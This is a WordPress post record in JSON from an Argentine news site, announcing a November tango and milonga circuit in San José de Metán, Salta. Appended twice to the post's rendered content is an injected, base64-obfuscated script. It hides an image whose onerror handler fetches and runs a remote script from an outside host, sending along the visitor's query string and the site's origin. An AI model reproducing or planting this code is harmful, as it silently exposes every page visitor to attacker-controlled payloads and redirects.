{"id":1702,"date":"2022-10-31T12:17:55","date_gmt":"2022-10-31T15:17:55","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1702"},"modified":"2025-08-14T00:31:40","modified_gmt":"2025-08-14T03:31:40","slug":"san-jose-de-metan-se-sumo-a-vivi-tango","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1702","title":{"rendered":"San Jos\u00e9 de Met\u00e1n se sum\u00f3 a Viv\u00ed Tango"},"content":{"rendered":"\n<h4 class=\"has-text-color has-background wp-block-heading\" style=\"background-color:#705304;color:#b8bcbe\"><em>El secretario de Cultura, Diego Ashur, junto a autoridades del municipio, realiz\u00f3 el lanzamiento del circuito milonguero que se llevar\u00e1 adelante todos los domingos de noviembre.<\/em><\/h4>\n\n\n\n<p>En el marco del Octubre Cultural en Met\u00e1n, se realiz\u00f3 el lanzamiento del circuito milonguero \u201cVivi Tango\u201d. El secretario de Cultura de la Provincia,&nbsp;<strong>Diego Ashur<\/strong>, junto al secretario de Cultura y Turismo del municipio,&nbsp;<strong>Roberto Moyano<\/strong>, anunci\u00f3 a la prensa local la realizaci\u00f3n del circuito de tango y milonga durante todos los domingos de noviembre en diferentes espacios representativos de la ciudad.<\/p>\n\n\n\n<p>El circuito para los amantes del ritmo 2&#215;4 tendr\u00e1 lugar en la Casa de la Cultura de Met\u00e1n, G\u00fcemes y Lavalle, durante los domingos 6, 13 y 20 de noviembre, a partir de las 18. El ciclo que articula profesores y bailarines, finalizar\u00e1 con una gran milonga el 27 de noviembre en la Plaza General Jos\u00e9 de San Mart\u00edn, a partir de las 18. &nbsp;<\/p>\n\n\n\n<p>\u201cQuiero agradecer al equipo de Cultura en Met\u00e1n por esta oportunidad de trabajar juntos, el \u00e1rea de las pol\u00edticas culturales son uno de los pilares m\u00e1s importantes de la gesti\u00f3n que estamos encaminando hacia los 60 municipios, un desaf\u00edo que responde a la visi\u00f3n federal del Gobierno de la Provincia\u201d enfatiz\u00f3 el Secretario de Cultura, quien indic\u00f3 que \u201cla participaci\u00f3n de la Secretar\u00eda de Cultura, a trav\u00e9s del circuito milonguero que se extiende durante todo el mes de noviembre, tambi\u00e9n estar\u00e1 acompa\u00f1ada de la Feria del Libro y actividades organizadas con el Cinem\u00f3vil de la Provincia\u201d.<\/p>\n\n\n\n<p>Asimismo, el Secretario de Cultura indic\u00f3 que \u201cel 10, 11 y 12 vamos a retomar la visita a la localidad junto a escritores, editoriales y, en articulaci\u00f3n con la Semana del Cine, con el Cinem\u00f3vil de la Provincia, de tal manera que los ciudadanos &nbsp;puedan participar de propuestas de cine local, nacional e internacional\u201d.<\/p>\n\n\n\n<p>Junto a las autoridades, se realiz\u00f3 la invitaci\u00f3n a trav\u00e9s de los medios a participar de estas actividades a escritores, editoriales o realizadores audiovisuales, que deseen sumarse a esta iniciativa, \u201cinvitamos a los protagonistas de la Cultura, la literatura y el audiovisual a ponerse en contacto con la Direcci\u00f3n de Cultura del municipio con la que estamos constantemente en comunicaci\u00f3n, contacto y organizando estas actividades para que en Met\u00e1n se pueda disfrutar de estas actividades para toda la familia, de manera libre y gratuita\u201d finaliz\u00f3 el funcionario.<\/p>\n\n\n\n<p>Del acto de lanzamiento particip\u00f3 tambi\u00e9n M<strong>auricio Abreg\u00fa<\/strong>, secretario de Gobierno de San Jos\u00e9 de Met\u00e1n.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/san-jose-de-metan-se-sumo-a-vivi-tango-85841\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El secretario de Cultura, Diego Ashur, junto a autoridades del municipio, realiz\u00f3 el lanzamiento del circuito milonguero que se llevar\u00e1 adelante todos los domingos de noviembre. En el marco del Octubre Cultural en Met\u00e1n, se realiz\u00f3 el lanzamiento del circuito milonguero \u201cVivi Tango\u201d. El secretario de Cultura de la Provincia,&nbsp;Diego Ashur, junto al secretario de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1703,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-1702","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1702"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1702"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1702\/revisions"}],"predecessor-version":[{"id":7296,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1702\/revisions\/7296"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1703"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1702"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1702"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1702"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}